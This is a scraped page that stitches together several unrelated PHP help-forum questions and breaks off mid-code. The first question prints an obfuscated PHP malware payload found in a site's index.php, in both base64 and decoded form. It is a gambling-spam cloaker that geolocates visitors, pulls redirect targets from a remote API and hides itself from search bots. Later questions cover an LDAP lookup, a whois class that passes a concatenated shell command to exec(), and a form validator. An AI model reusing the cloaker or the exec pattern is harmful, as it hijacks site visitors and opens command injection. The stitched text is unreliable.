This question already has answers here:
My site is infected with obfuscated PHP malware - what is it doing + how do I get rid of it?
(6 answers)
Closed 4 months ago.
Hello i found my site had this code in index.php
Any one can translate this code please?
eval(base64_decode('CiBnb3RvIEV1SU45OyBZU1NPRDogJGNlayA9IGZpbGVfZ2V0X2NvbnRlbnRzKCJceDY4XHg3NFwxNjRcMTYwXHg3M1w3Mlx4MmZcNTdcMTUyXHg3M1x4NmZcMTU2XHgyZVwxNDdceDY1XDE1N1wxNTFceDcwXHg2Y1x4NmZceDZmXDE1M1wxNjVceDcwXHgyZVwxNTFcMTU3XHgyZiIgLiAkaXApOyBnb3RvIGdUcjNXOyBnWFVUSzogZGF0ZV9kZWZhdWx0X3RpbWV6b25lX3NldCgiXHg0MVwxNjNcMTUxXDE0MVx4MmZceDQyXDE0MVwxNTZceDY3XDE1M1wxNTdcMTUzIik7IGdvdG8gSUhOQlg7IFhpWXZPOiBpZiAoJGNsb2Fja2luZyAhPSAiXDExN1x4NGUiKSB7IGluY2x1ZGUgJG5vbmp1ZGk7IGRpZTsgfSBlbHNlIHsgaWYgKGluX2FycmF5KCRjb3VudHJ5Y29kZSwgJG5lZ2FyYSkgJiYgaXNtb2JpbGUoJG9ubHltb2JpbGUpICYmIGdjbGlkKCRvbmx5Z2NsaWQpKSB7IGluY2x1ZGUgJGp1ZGk7IH0gZWxzZSB7IGlmIChpbl9hcnJheSgkaXAsICRiYW5pcCkpIHsgaW5jbHVkZSAkbm9uanVkaTsgfSBlbHNlIHsgaWYgKGluX2FycmF5KCRpcCwgJHdsaXApKSB7IGluY2x1ZGUgJGp1ZGk7IH0gZWxzZSB7IGlmIChzdHJwb3Moc3RydG9sb3dlcigkaHR0cF91c2VyX2FnZW50KSwgZ29vZ2xlKSAhPT0gZmFsc2UgfHwgc3RycG9zKHN0cnRvbG93ZXIoJGh0dHBfdXNlcl9hZ2VudCksIGJvdCkgIT09IGZhbHNlIHx8IHN0cnBvcyhzdHJ0b2xvd2VyKCRob3N0KSwgZ29vZ2xlKSAhPT0gZmFsc2UpIHsgaW5jbHVkZSAkbm9uanVkaTsgfSBlbHNlIHsgaW5jbHVkZSAkbm9uanVkaTsgfSB9IH0gfSB9IGdvdG8gWm9NSmo7IFNWNERFOiAkcmVmZXJlciA9IGlzc2V0KCRfU0VSVkVSWyJceDQ4XDEyNFwxMjRcMTIwXHg1ZlwxMjJceDQ1XHg0Nlx4NDVceDUyXHg0NVx4NTIiXSkgPyAkX1NFUlZFUlsiXHg0OFx4NTRceDU0XDEyMFwxMzdceDUyXHg0NVx4NDZcMTA1XDEyMlx4NDVceDUyIl0gOiAnJzsgZ290byBnNjlkZTsgZHRQSW06IGlmICghaXNzZXQoJGlwKSkgeyAkaXAgPSAkX1NFUlZFUlsiXDEyMlx4NDVceDRkXDExN1x4NTRceDQ1XDEzN1x4NDFceDQ0XDEwNFx4NTIiXTsgfSBnb3RvIFJTaUViOyBLcUVQbDogJHdlYl9wYWdlID0gJF9TRVJWRVJbIlx4NTNceDQzXDEyMlwxMTFcMTIwXDEyNFx4NWZceDRlXDEwMVwxMTVcMTA1Il07IGdvdG8gQkVDSkg7IGc2OWRlOiAkaHR0cF91c2VyX2FnZW50ID0gaXNzZXQoJF9TRVJWRVJbIlwxMTBceDU0XHg1NFx4NTBcMTM3XDEyNVwxMjNceDQ1XDEyMlx4NWZceDQxXHg0N1x4NDVceDRlXDEyNCJdKSA/ICRfU0VSVkVSWyJcMTEwXHg1NFwxMjRceDUwXDEzN1x4NTVceDUzXHg0NVwxMjJcMTM3XDEwMVx4NDdcMTA1XDExNlwxMjQiXSA6ICJcMTU2XDE1N1x4MjBcMTI1XHg3M1wxNDVcMTYyXDU1XHg2MVx4NjdcMTQ1XHg2ZVwxNjQiOyBnb3RvIEtxRVBsOyBSU2lFYjogJHBsID0gZmlsZV9nZXRfY29udGVudHMoIlx4NjhcMTY0XDE2NFwxNjBceDczXHgzYVw1N1w1N1wxNTRceDZmXDE1M1x4NmNceDY5XDE0MVx4NzVceDJlXHg2M1x4NmZceDZkXHgyZlx4NjNceDZjXHg2Zlx4NjFcMTUzXDU1XHg2MVx4NzBcMTUxXHgyZiIgLiAkUFRDb2RlKTsgZ290byBDQWNvaDsgSUhOQlg6ICRpcCA9ICRfU0VSVkVSWyJcMTEwXDEyNFx4NTRcMTIwXHg1ZlwxMDNceDQ2XHg1ZlwxMDNcMTE3XDExNlwxMTZceDQ1XDEwM1x4NTRcMTExXHg0ZVx4NDdcMTM3XHg0OVx4NTAiXTsgZ290byBkdFBJbTsgTHBxV006ICRob3N0ID0gJGlzcDsgZ290byBYaVl2TzsgRXVJTjk6IGluY2x1ZGUgIlwxNjNceDY1XHg3NFwxNjVceDcwXDU2XDE2MFwxNTBcMTYwIjsgZ290byBnWFVUSzsgQWpmMTg6IGZ1bmN0aW9uIGdjbGlkKCRnKSB7IGlmICgkZyA9PSAiXDEzMVwxMDEiKSB7IGlmIChpc3NldCgkX0dFVFsiXHg2N1x4NjNcMTU0XDE1MVx4NjQiXSkgJiYgIWVtcHR5KCRfR0VUWyJcMTQ3XDE0M1x4NmNceDY5XHg2NCJdKSAmJiBzdHJsZW4oJF9HRVRbIlwxNDdcMTQzXDE1NFwxNTFceDY0Il0pID4gMzIpIHsgcmV0dXJuIHRydWU7IH0gZWxzZSB7IHJldHVybiBmYWxzZTsgfSB9IGVsc2UgeyByZXR1cm4gdHJ1ZTsgfSB9IGdvdG8gWVNTT0Q7IEJFQ0pIOiAkZG9tYWluID0gJF9TRVJWRVJbIlx4NTNcMTA1XHg1MlwxMjZcMTA1XHg1MlwxMzdceDRlXHg0MVwxMTVceDQ1Il07IGdvdG8gTHBxV007IENBY29oOiAkbyA9IGpzb25fZGVjb2RlKCRwbCk7IGdvdG8gaFFMYzg7IHVoNWhfOiBpZiAoIWluX2FycmF5KCRfU0VSVkVSWyJceDQ4XHg1NFx4NTRceDUwXHg1ZlwxMTBceDRmXDEyM1wxMjQiXSwgJGxpc3QpKSB7IGhlYWRlcigiXHg0Y1wxNTdceDYzXHg2MVx4NzRcMTUxXHg2ZlwxNTZcNzJcNDAiIC4gJGZibFswXSk7IGRpZTsgfSBnb3RvIGJJTnB0OyBnVHIzVzogJHN0YXR1cyA9IGpzb25fZGVjb2RlKCRjZWspLT5zdWNjZXNzOyBnb3RvIHQ4MFV1OyBoUUxjODogJGxpc3QgPSAkby0+bGlzdDsgZ290byBCVkhZejsgYklOcHQ6IGZ1bmN0aW9uIGlzbW9iaWxlKCRtKSB7IGlmICgkbSA9PSAiXHg1OVx4NDEiKSB7IHJldHVybiBwcmVnX21hdGNoKCJcNTdceDI4XHg2MVwxNTZcMTQ0XHg3MlwxNTdceDY5XDE0NFx4N2NcMTQxXHg3Nlx4NjFcMTU2XHg3NFwxNDdcMTU3XHg3Y1wxNDJceDZjXHg2MVwxNDNceDZiXDE0MlwxNDVceDcyXHg3Mlx4NzlcMTc0XHg2Mlx4NmZcMTU0XDE2NFx4N2NceDYyXHg2ZlwxNTdceDczXDE2NFwxNzRceDYzXHg3Mlx4NjlcMTQzXDE1M1wxNDVcMTY0XDE3NFwxNDRceDZmXDE0M1x4NmZceDZkXDE1N1x4N2NcMTQ2XDE1N1wxNTZcMTQ1XHg3Y1wxNTBceDY5XDE2MFx4NzRceDZmXHg3MFwxNzRceDZkXHg2OVwxNTZceDY5XDE3NFwxNTVceDZmXHg2MlwxNTFceDdjXHg3MFx4NjFcMTU0XHg2ZFx4N2NceDcwXDE1MFx4NmZcMTU2XDE0NVwxNzRcMTYwXDE1MVwxNDVceDdjXHg3NFx4NjFcMTQyXHg2Y1wxNDVceDc0XHg3Y1wxNjVceDcwXDEzNFw1NlwxNDJcMTYyXDE1N1wxNjdcMTYzXHg2NVx4NzJceDdjXDE2NVwxNjBceDVjXHgyZVwxNTRceDY5XHg2ZVwxNTNceDdjXHg3N1wxNDVceDYyXHg2Zlx4NzNceDdjXDE2N1wxNTdcMTYzXDUxXDU3XDE1MSIsICRfU0VSVkVSWyJceDQ4XHg1NFx4NTRcMTIwXHg1ZlwxMjVcMTIzXHg0NVwxMjJceDVmXHg0MVwxMDdcMTA1XDExNlx4NTQiXSk7IH0gZWxzZSB7IHJldHVybiB0cnVlOyB9IH0gZ290byBBamYxODsgQlZIWXo6ICRmYmwgPSAkby0+bGluazsgZ290byB1aDVoXzsgdDgwVXU6IGlmICgkc3RhdHVzICE9IHRydWUpIHsgJGlwYXBpID0gZmlsZV9nZXRfY29udGVudHMoIlwxNTBceDc0XHg3NFwxNjBceDNhXDU3XHgyZlwxNTFceDcwXDU1XHg2MVx4NzBceDY5XHgyZVx4NjNceDZmXDE1NVx4MmZcMTUyXDE2M1wxNTdcMTU2XHgyZiIgLiAkaXApOyAkY291bnRyeSA9IGpzb25fZGVjb2RlKCRpcGFwaSktPmNvdW50cnk7ICRjb3VudHJ5Y29kZSA9IGpzb25fZGVjb2RlKCRpcGFwaSktPmNvdW50cnlDb2RlOyAkY2l0eSA9IGpzb25fZGVjb2RlKCRpcGFwaSktPmNpdHk7ICRvcmcgPSBqc29uX2RlY29kZSgkY2VrKS0+b3JnOyAkaXNwID0ganNvbl9kZWNvZGUoJGNlayktPmlzcDsgfSBlbHNlIHsgJGNvdW50cnkgPSBqc29uX2RlY29kZSgkY2VrKS0+Y291bnRyeV9uYW1lOyAkY291bnRyeWNvZGUgPSBqc29uX2RlY29kZSgkY2VrKS0+Y291bnRyeV9jb2RlOyAkY2l0eSA9IGpzb25fZGVjb2RlKCRjZWspLT5jaXR5OyAkb3JnID0ganNvbl9kZWNvZGUoJGNlayktPmFzbl9vcmc7ICRpc3AgPSBqc29uX2RlY29kZSgkY2VrKS0+aXNwOyB9IGdvdG8gU1Y0REU7IFpvTUpqOiA='));
Edit:
The output of the base64 seems fishy. Someone try to inject obfuscated codes through eval() function.
decoded base64 output:
goto EuIN9; YSSOD: $cek = file_get_contents("\x68\x74\164\160\x73\72\x2f\57\152\x73\x6f\156\x2e\147\x65\157\151\x70\x6c\x6f\x6f\153\165\x70\x2e\151\157\x2f" . $ip); goto gTr3W; gXUTK: date_default_timezone_set("\x41\163\151\141\x2f\x42\141\156\x67\153\157\153"); goto IHNBX; XiYvO: if ($cloacking != "\117\x4e") { include $nonjudi; die; } else { if (in_array($countrycode, $negara) && ismobile($onlymobile) && gclid($onlygclid)) { include $judi; } else { if (in_array($ip, $banip)) { include $nonjudi; } else { if (in_array($ip, $wlip)) { include $judi; } else { if (strpos(strtolower($http_user_agent), google) !== false || strpos(strtolower($http_user_agent), bot) !== false || strpos(strtolower($host), google) !== false) { include $nonjudi; } else { include $nonjudi; } } } } } goto ZoMJj; SV4DE: $referer = isset($_SERVER["\x48\124\124\120\x5f\122\x45\x46\x45\x52\x45\x52"]) ? $_SERVER["\x48\x54\x54\120\137\x52\x45\x46\105\122\x45\x52"] : ''; goto g69de; dtPIm: if (!isset($ip)) { $ip = $_SERVER["\122\x45\x4d\117\x54\x45\137\x41\x44\104\x52"]; } goto RSiEb; KqEPl: $web_page = $_SERVER["\x53\x43\122\111\120\124\x5f\x4e\101\115\105"]; goto BECJH; g69de: $http_user_agent = isset($_SERVER["\110\x54\x54\x50\137\125\123\x45\122\x5f\x41\x47\x45\x4e\124"]) ? $_SERVER["\110\x54\124\x50\137\x55\x53\x45\122\137\101\x47\105\116\124"] : "\156\157\x20\125\x73\145\162\55\x61\x67\145\x6e\164"; goto KqEPl; RSiEb: $pl = file_get_contents("\x68\164\164\160\x73\x3a\57\57\154\x6f\153\x6c\x69\141\x75\x2e\x63\x6f\x6d\x2f\x63\x6c\x6f\x61\153\55\x61\x70\151\x2f" . $PTCode); goto CAcoh; IHNBX: $ip = $_SERVER["\110\124\x54\120\x5f\103\x46\x5f\103\117\116\116\x45\103\x54\111\x4e\x47\137\x49\x50"]; goto dtPIm; LpqWM: $host = $isp; goto XiYvO; EuIN9: include "\163\x65\x74\165\x70\56\160\150\160"; goto gXUTK; Ajf18: function gclid($g) { if ($g == "\131\101") { if (isset($_GET["\x67\x63\154\151\x64"]) && !empty($_GET["\147\143\x6c\x69\x64"]) && strlen($_GET["\147\143\154\151\x64"]) > 32) { return true; } else { return false; } } else { return true; } } goto YSSOD; BECJH: $domain = $_SERVER["\x53\105\x52\126\105\x52\137\x4e\x41\115\x45"]; goto LpqWM; CAcoh: $o = json_decode($pl); goto hQLc8; uh5h_: if (!in_array($_SERVER["\x48\x54\x54\x50\x5f\110\x4f\123\124"], $list)) { header("\x4c\157\x63\x61\x74\151\x6f\156\72\40" . $fbl[0]); die; } goto bINpt; gTr3W: $status = json_decode($cek)->success; goto t80Uu; hQLc8: $list = $o->list; goto BVHYz; bINpt: function ismobile($m) { if ($m == "\x59\x41") { return preg_match("\57\x28\x61\156\144\x72\157\x69\144\x7c\141\x76\x61\156\x74\147\157\x7c\142\x6c\x61\143\x6b\142\145\x72\x72\x79\174\x62\x6f\154\164\x7c\x62\x6f\157\x73\164\174\x63\x72\x69\143\153\145\164\174\144\x6f\143\x6f\x6d\157\x7c\146\157\156\145\x7c\150\x69\160\x74\x6f\x70\174\x6d\x69\156\x69\174\155\x6f\x62\151\x7c\x70\x61\154\x6d\x7c\x70\150\x6f\156\145\174\160\151\145\x7c\x74\x61\142\x6c\145\x74\x7c\165\x70\134\56\142\162\157\167\163\x65\x72\x7c\165\160\x5c\x2e\154\x69\x6e\153\x7c\x77\145\x62\x6f\x73\x7c\167\157\163\51\57\151", $_SERVER["\x48\x54\x54\120\x5f\125\123\x45\122\x5f\x41\107\105\116\x54"]); } else { return true; } } goto Ajf18; BVHYz: $fbl = $o->link; goto uh5h_; t80Uu: if ($status != true) { $ipapi = file_get_contents("\150\x74\x74\160\x3a\57\x2f\151\x70\55\x61\x70\x69\x2e\x63\x6f\155\x2f\152\163\157\156\x2f" . $ip); $country = json_decode($ipapi)->country; $countrycode = json_decode($ipapi)->countryCode; $city = json_decode($ipapi)->city; $org = json_decode($cek)->org; $isp = json_decode($cek)->isp; } else { $country = json_decode($cek)->country_name; $countrycode = json_decode($cek)->country_code; $city = json_decode($cek)->city; $org = json_decode($cek)->asn_org; $isp = json_decode($cek)->isp; } goto SV4DE; ZoMJj:
I'm trying to connect to Active directory and validate my user which works and the I retrieve a certain field which returns and employeecode that stored in AD for our payroll/ESS application, this code has been working on multiple different clients but suddenly at one client the code runs through until it get to the ldap_get_entries, the ldap_search ran successfully but nothing is getting returned in get_entries
If checked some similar problems where people changed sAMAccount to uid or email in the filter but that hasn't helped me solve this, does anyone maybe have an idea whatI missed that would make this code fail on one system but work fine on others
the magic happens in the second function (RetrieveADEntry), the first(Authenticate) is just to show my connection
public function authenticate()
{
error_reporting(0);
//10.0.4.22
$this->ldapConnection = ldap_connect($this->mHost, $this->mPort);
if(isset($this->ldapConnection))
{
if(trim($this->mUsername) === "")
{
$this->mErrorCode = ERR_USERNAME_REQUIRED;
$this->mConnected = false;
return false;
}
else if(trim($this->mPassword) === "")
{
$this->mErrorCode = ERR_PASSWORD_REQUIRED;
$this->mConnected = false;
return false;
}
echo "pre bind";
ldap_set_option($this->ldapConnection, LDAP_OPT_PROTOCOL_VERSION, 3);
ldap_set_option($ldap, LDAP_OPT_REFERRALS, 0);
if ($this->mGroup == null)
{
$ldaprdn = $this->mPrdn . "\\" . $this->mUsername;
}
else
{
$ldaprdn = 'cn='.$this->mGroup.$this->mPrdn . "\\" . $this->mUsername;
}
$mConnected = ldap_bind($this->ldapConnection, $ldaprdn, $this->mPassword);
if ($mConnected)
{
$this->retrieveADEntry();
echo "Binded";
if ($this->mErrorCode == UNAUTHORIZED)
{
$this->mErrorCode = UNAUTHORIZED;
$this->mConnected = false;
}
else if ($this->mErrorCode == ERR_LOGIN_FAILED)
{
$this->mErrorCode = ERR_LOGIN_FAILED;
$this->mConnected = false;
}
else
{
$this->mErrorCode = SUCCESSFUL;
$this->mConnected = true;
if ($data->{"rlogcompanycode"} != ''){
$this->setCompanyCode(trim((string)$data->{"rlogcompanycode"}));
}
}
}
else
{
echo "Not binded";
$this->mErrorCode = ERR_LOGIN_FAILED;
$this->mConnected = false;
}
return $this->mConnected;
}
else{
$this->mErrorCode = ERR_CONNECTION_FAILED;
$this->mConnected = false;
return false;
}
error_reporting(E_ALL);
}
private function retrieveADEntry()
{
//$ldap_base_dn = 'DC='.$this->mDC.',DC='.$this->mDomain;
$ldap_base_dn = "OU=group,DC=domain,DC=co,DC=za";
$filter = "";
$attr = array(
$this->mField,
"sAMAccountName",
);
$filter .="(sAMAccountName=$this->mUsername)";
$search_results = ldap_search($this->ldapConnection,$ldap_base_dn, $filter);
//For each account returned by the search
if (FALSE !== $search_results ){
$entries = ldap_get_entries($this->ldapConnection, $search_results);
$values = ldap_get_values($this->ldapConnection,$search_results, $attr);
$access = 0;
//For each account returned by the search
echo "succesfull query";
echo $entries['count'];
echo $this->mUsername;
var_dump($values);
for ($x=0; $x<$entries['count']; $x++)
{
echo "in loop";
var_dump($entries);
if (strpos( $entries[$x]['memberof'][0], $this->mGroup)) //Check if member is part of specified group
{
echo "GroupCheck1";
$access = 1;
$group = $this->mGroup;
}
if ($this->mGroup == null)
{
echo "GroupCheck2";
$access = 1;
}
echo "PostGroupChecks";
echo $access;
if ($access != 0)
{
echo "access";
echo $this->mField;
echo $entries[$x]['sAMAccountName'][0];
if (!empty($entries[$x][$this->mField][0]))
{
$this->setEmpkey($entries[$x][$this->mField][0]);
echo $entries[$x][$this->mField][0];
}
echo "return succesfull";
$this->mConnected = true;
$this->mErrorCode = SUCCESSFUL;
}
else
{
echo "No Access";
$this->mConnected = false;
$this->mErrorCode = UNAUTHORIZED;
} //END for loop
}
//END FALSE !== $result
ldap_unbind($ldap_connection); // Clean up after ourselves.
}
else
{
$this->mConnected = false;
$this->mErrorCode = ERR_LOGIN_FAILED;
}
return $this->ldapEntry;
}
PS. I also wrote a C# script for our desktop app which works perfectly fine on this system just like on all the rest and doesn't give this issue
I am using this whois class, it works fine on one server but it does not work properly on another server with the same PHP version 5.4, on first server it returns domain name status correctly, but on the other one it returns just one status: "domain name is not available" while the domain name is actually available.
<?
class Whois_domain {
var $possible_tlds;
var $whois_server;
var $free_string;
var $whois_param;
var $domain;
var $tld;
var $compl_domain;
var $full_info;
var $msg;
var $info;
var $os_system = "linux"; // switch between "linux" and "win"
function Whois_domain() {
$this->info = "";
$this->msg = "";
}
function process() {
if ($this->create_domain()) {
if ($this->full_info == "yes") {
$this->get_domain_info();
} else {
if ($this->check_only() == 1) {
$this->msg = "The domain name: <b>".$this->compl_domain."</b> is free.";
return true;
} elseif ($this->check_only() == 0) {
$this->msg = "The domain name: <b>".$this->compl_domain."</b> is not available";
return false;
} else {
$this->msg = "There was something wrong, try it again.";
}
}
} else {
$this->msg = "Only letters, numbers and hyphens (-) are valid!";
}
}
function check_entry() {
if (preg_match("/^([a-z0-9]+(\-?[a-z0-9]*)){2,63}$/i", $this->domain)) {
return true;
} else {
return false;
}
}
function create_tld_select() {
$menu = "<select name=\"tld\" style=\"margin-left:0;\">\n";
foreach ($this->possible_tlds as $val) {
$menu .= " <option value=\"".$val."\"";
$menu .= (isset($_POST['tld']) && $_POST['tld'] == $val) ? " selected=\"selected\">" : ">";
$menu .= $val."</option>\n";
}
$menu .= "</select>\n";
return $menu;
}
function create_domain() {
if ($this->check_entry()) {
$this->domain = strtolower($this->domain);
$this->compl_domain = $this->domain.".".$this->tld;
return true;
} else {
return false;
}
}
function check_only() {
$data = $this->get_whois_data();
if (is_array($data)) {
$found = 0;
foreach ($data as $val) {
if (eregi($this->free_string, $val)) {
$found = 1;
}
}
return $found;
} else {
$this->msg = "Error, please try it again.";
}
}
function get_domain_info() {
if ($this->create_domain()) {
$data = ($this->tld == "nl") ? $this->get_whois_data(true) : $this->get_whois_data();
if (is_array($data)) {
foreach ($data as $val) {
if (eregi($this->free_string, $val)) {
$this->msg = "The domain name: <b>".$this->compl_domain."</b> is free.";
$this->info = "";
break;
}
$this->info .= $val;
}
} else {
$this->msg = "Error, please try it again.";
}
} else {
$this->msg = "Only letters, numbers and hyphens (-) are valid!";
}
}
function get_whois_data($empty_param = false) {
// the parameter is new since version 1.20 and is used for .nl (dutch) domains only
if ($empty_param) {
$this->whois_param = "";
}
if ($this->tld == "de") $this->os_system = "win"; // this tld must be queried with fsock otherwise it will not work
if ($this->os_system == "win") {
$connection = #fsockopen($this->whois_server, 43);
if (!$connection) {
unset($connection);
$this->msg = "Can't connect to the server!";
return;
} else {
sleep(2);
fputs($connection, $this->whois_param.$this->compl_domain."\r\n");
while (!feof($connection)) {
$buffer[] = fgets($connection, 4096);
}
fclose($connection);
}
} else {
$string = "whois -h ".$this->whois_server." \"".$this->whois_param.$this->compl_domain."\"";
$string = str_replace (";", "", $string).";";
exec($string, $buffer);
}
if (isset($buffer)) {
//print_r($buffer);
return $buffer;
} else {
$this->msg = "Can't retrieve data from the server!";
}
}
}
?>
I changed files permissions and php versions on the other server, but still the same.
This has been solved, it was fsockopen restrictions on the server, it is fine now.
This question already has answers here:
How to fix "Headers already sent" error in PHP
(11 answers)
Closed 9 years ago.
Does anyone see how headers could be sent in this script? I am using this script to validate a form. As a result it is causing headers to be sent so when I try to direct a user after implementing this script it causes the normal "Warning: Cannot modify header information - headers already sent" message. Here is the script:
<?php
class ValidatorObj
{
var $variable_name;
var $validator_string;
var $error_string;
}
/**
* Base class for custom validation objects
**/
class CustomValidator
{
function DoValidate(&$formars,&$error_hash)
{
return true;
}
}
/** Default error messages*/
define("E_VAL_REQUIRED_VALUE","Please enter the value for %s");
define("E_VAL_MAXLEN_EXCEEDED","Maximum length exceeded for %s.");
define("E_VAL_MINLEN_CHECK_FAILED","Please enter input with length more than %d for %s");
define("E_VAL_ALNUM_CHECK_FAILED","Please provide an alpha-numeric input for %s");
define("E_VAL_ALNUM_S_CHECK_FAILED","Please provide an alpha-numeric input for %s");
define("E_VAL_NUM_CHECK_FAILED","Please provide numeric input for %s");
define("E_VAL_ALPHA_CHECK_FAILED","Please provide alphabetic input for %s");
define("E_VAL_ALPHA_S_CHECK_FAILED","Please provide alphabetic input for %s");
define("E_VAL_EMAIL_CHECK_FAILED","Please provide a valida email address");
define("E_VAL_LESSTHAN_CHECK_FAILED","Enter a value less than %f for %s");
define("E_VAL_GREATERTHAN_CHECK_FAILED","Enter a value greater than %f for %s");
define("E_VAL_REGEXP_CHECK_FAILED","Please provide a valid input for %s");
define("E_VAL_DONTSEL_CHECK_FAILED","Wrong option selected for %s");
define("E_VAL_SELMIN_CHECK_FAILED","Please select minimum %d options for %s");
define("E_VAL_SELONE_CHECK_FAILED","Please select an option for %s");
define("E_VAL_EQELMNT_CHECK_FAILED","Value of %s should be same as that of %s");
define("E_VAL_NEELMNT_CHECK_FAILED","Value of %s should not be same as that of %s");
class FormValidator
{
var $validator_array;
var $error_hash;
var $custom_validators;
function FormValidator()
{
$this->validator_array = array();
$this->error_hash = array();
$this->custom_validators=array();
}
function AddCustomValidator(&$customv)
{
array_push($this->custom_validators,$customv);
}
function addValidation($variable,$validator,$error)
{
$validator_obj = new ValidatorObj();
$validator_obj->variable_name = $variable;
$validator_obj->validator_string = $validator;
$validator_obj->error_string = $error;
array_push($this->validator_array,$validator_obj);
}
function GetErrors()
{
return $this->error_hash;
}
function ValidateForm()
{
$bret = true;
$error_string="";
$error_to_display = "";
if(strcmp($_SERVER['REQUEST_METHOD'],'POST')==0)
{
$form_variables = $_POST;
}
else
{
$form_variables = $_GET;
}
$vcount = count($this->validator_array);
foreach($this->validator_array as $val_obj)
{
if(!$this->ValidateObject($val_obj,$form_variables,$error_string))
{
$bret = false;
$this->error_hash[$val_obj->variable_name] = $error_string;
}
}
if(true == $bret && count($this->custom_validators) > 0)
{
foreach( $this->custom_validators as $custom_val)
{
if(false == $custom_val->DoValidate($form_variables,$this->error_hash))
{
$bret = false;
}
}
}
return $bret;
}
function ValidateObject($validatorobj,$formvariables,&$error_string)
{
$bret = true;
$splitted = explode("=",$validatorobj->validator_string);
$command = $splitted[0];
$command_value = '';
if(isset($splitted[1]) && strlen($splitted[1])>0)
{
$command_value = $splitted[1];
}
$default_error_message="";
$input_value ="";
if(isset($formvariables[$validatorobj->variable_name]))
{
$input_value = $formvariables[$validatorobj->variable_name];
}
$bret = $this->ValidateCommand($command,$command_value,$input_value,
$default_error_message,
$validatorobj->variable_name,
$formvariables);
if(false == $bret)
{
if(isset($validatorobj->error_string) &&
strlen($validatorobj->error_string)>0)
{
$error_string = $validatorobj->error_string;
}
else
{
$error_string = $default_error_message;
}
}//if
return $bret;
}
function validate_req($input_value, &$default_error_message,$variable_name)
{
$bret = true;
if(!isset($input_value) ||
strlen($input_value) <=0)
{
$bret=false;
$default_error_message = sprintf(E_VAL_REQUIRED_VALUE,$variable_name);
}
return $bret;
}
function validate_maxlen($input_value,$max_len,$variable_name,&$default_error_message)
{
$bret = true;
if(isset($input_value) )
{
$input_length = strlen($input_value);
if($input_length > $max_len)
{
$bret=false;
$default_error_message = sprintf(E_VAL_MAXLEN_EXCEEDED,$variable_name);
}
}
return $bret;
}
function validate_minlen($input_value,$min_len,$variable_name,&$default_error_message)
{
$bret = true;
if(isset($input_value) )
{
$input_length = strlen($input_value);
if($input_length < $min_len)
{
$bret=false;
$default_error_message = sprintf(E_VAL_MINLEN_CHECK_FAILED,$min_len,$variable_name);
}
}
return $bret;
}
function test_datatype($input_value,$reg_exp)
{
if(ereg($reg_exp,$input_value))
{
return false;
}
return true;
}
function validate_email($email)
{
return eregi("^[_\.0-9a-zA-Z-]+#([0-9a-zA-Z][0-9a-zA-Z-]+\.)+[a-zA-Z]{2,6}$", $email);
}
function validate_for_numeric_input($input_value,&$validation_success)
{
$more_validations=true;
$validation_success = true;
if(strlen($input_value)>0)
{
if(false == is_numeric($input_value))
{
$validation_success = false;
$more_validations=false;
}
}
else
{
$more_validations=false;
}
return $more_validations;
}
function validate_lessthan($command_value,$input_value,
$variable_name,&$default_error_message)
{
$bret = true;
if(false == $this->validate_for_numeric_input($input_value,
$bret))
{
return $bret;
}
if($bret)
{
$lessthan = doubleval($command_value);
$float_inputval = doubleval($input_value);
if($float_inputval >= $lessthan)
{
$default_error_message = sprintf(E_VAL_LESSTHAN_CHECK_FAILED,
$lessthan,
$variable_name);
$bret = false;
}//if
}
return $bret ;
}
function validate_greaterthan($command_value,$input_value,$variable_name,&$default_error_message)
{
$bret = true;
if(false == $this->validate_for_numeric_input($input_value,$bret))
{
return $bret;
}
if($bret)
{
$greaterthan = doubleval($command_value);
$float_inputval = doubleval($input_value);
if($float_inputval <= $greaterthan)
{
$default_error_message = sprintf(E_VAL_GREATERTHAN_CHECK_FAILED,
$greaterthan,
$variable_name);
$bret = false;
}//if
}
return $bret ;
}
function validate_select($input_value,$command_value,&$default_error_message,$variable_name)
{
$bret=false;
if(is_array($input_value))
{
foreach($input_value as $value)
{
if($value == $command_value)
{
$bret=true;
break;
}
}
}
else
{
if($command_value == $input_value)
{
$bret=true;
}
}
if(false == $bret)
{
$default_error_message = sprintf(E_VAL_SHOULD_SEL_CHECK_FAILED,
$command_value,$variable_name);
}
return $bret;
}
function validate_dontselect($input_value,$command_value,&$default_error_message,$variable_name)
{
$bret=true;
if(is_array($input_value))
{
foreach($input_value as $value)
{
if($value == $command_value)
{
$bret=false;
$default_error_message = sprintf(E_VAL_DONTSEL_CHECK_FAILED,$variable_name);
break;
}
}
}
else
{
if($command_value == $input_value)
{
$bret=false;
$default_error_message = sprintf(E_VAL_DONTSEL_CHECK_FAILED,$variable_name);
}
}
return $bret;
}
function ValidateCommand($command,$command_value,$input_value,&$default_error_message,$variable_name,$formvariables)
{
$bret=true;
switch($command)
{
case 'req':
{
$bret = $this->validate_req($input_value, $default_error_message,$variable_name);
break;
}
case 'maxlen':
{
$max_len = intval($command_value);
$bret = $this->validate_maxlen($input_value,$max_len,$variable_name,
$default_error_message);
break;
}
case 'minlen':
{
$min_len = intval($command_value);
$bret = $this->validate_minlen($input_value,$min_len,$variable_name,
$default_error_message);
break;
}
case 'alnum':
{
$bret= $this->test_datatype($input_value,"[^A-Za-z0-9]");
if(false == $bret)
{
$default_error_message = sprintf(E_VAL_ALNUM_CHECK_FAILED,$variable_name);
}
break;
}
case 'alnum_s':
{
$bret= $this->test_datatype($input_value,"[^A-Za-z0-9 ]");
if(false == $bret)
{
$default_error_message = sprintf(E_VAL_ALNUM_S_CHECK_FAILED,$variable_name);
}
break;
}
case 'num':
case 'numeric':
{
$bret= $this->test_datatype($input_value,"[^0-9]");
if(false == $bret)
{
$default_error_message = sprintf(E_VAL_NUM_CHECK_FAILED,$variable_name);
}
break;
}
case 'alpha':
{
$bret= $this->test_datatype($input_value,"[^A-Za-z]");
if(false == $bret)
{
$default_error_message = sprintf(E_VAL_ALPHA_CHECK_FAILED,$variable_name);
}
break;
}
case 'alpha_s':
{
$bret= $this->test_datatype($input_value,"[^A-Za-z ]");
if(false == $bret)
{
$default_error_message = sprintf(E_VAL_ALPHA_S_CHECK_FAILED,$variable_name);
}
break;
}
case 'email':
{
if(isset($input_value) && strlen($input_value)>0)
{
$bret= $this->validate_email($input_value);
if(false == $bret)
{
$default_error_message = E_VAL_EMAIL_CHECK_FAILED;
}
}
break;
}
case "lt":
case "lessthan":
{
$bret = $this->validate_lessthan($command_value,
$input_value,
$variable_name,
$default_error_message);
break;
}
case "gt":
case "greaterthan":
{
$bret = $this->validate_greaterthan($command_value,
$input_value,
$variable_name,
$default_error_message);
break;
}
case "regexp":
{
if(isset($input_value) && strlen($input_value)>0)
{
if(!preg_match("$command_value",$input_value))
{
$bret=false;
$default_error_message = sprintf(E_VAL_REGEXP_CHECK_FAILED,$variable_name);
}
}
